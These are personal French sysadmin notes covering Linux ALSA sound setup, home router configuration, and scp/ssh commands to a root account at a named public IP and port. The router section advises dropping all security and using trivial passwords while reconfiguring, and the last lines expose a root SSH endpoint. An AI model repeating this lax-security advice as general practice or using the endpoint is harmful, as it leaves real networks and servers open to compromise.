-----------------------------------------------------------------
Faire marcher le son
-----------------------------------------------------------------


outils ; 
pavucontrol
alsamixer
alsactl init
pulseaudio -D

alsa-info  ou aplay -l
chercher soundcards et reperer l'index (moi 0)

creer   ~/.asoundrc  et inserer ce qui suit. Le 0 est l'index de la carte son

pcm.!default {
    type hw
    card 0
}
 
ctl.!default {
    type hw
    card 0
}




-----------------------------------------------------------------
config Reseau Routeurs maison
-----------------------------------------------------------------

	Laisser tout ouvert pendant les temps de reconfiguration du réseau sinon c'est le bordel
	Ne pas faire de sécurité.
	Désactiver wifi
	laisser dhcp
	pas de filtrage Mac, ca tourne systematiquement au gros bordel
	mettre des mots de passe de neuneu, le temps de la config
	
	
	
	A LA FIN
		mettre en réservation dhcp les routeurs sur le routeur wan
		remettre les mots de passe couillus
		eventuellement, si tout marche bien mettre du filtrage MAC : attention, ca empeche de gerer si pb sur routeur n + 1
		






-----------------------------------------------------------------
Copie des fichiers Maison <-> Memo 
-----------------------------------------------------------------
scp -r -P 61411 root@109.8.238.11:/root/Server/Trucmuche   /root/Rep
OU sinon par Projets GIT, plus simple



Connexion ssh maison vers 
ssh -p 61411 root@109.8.238.11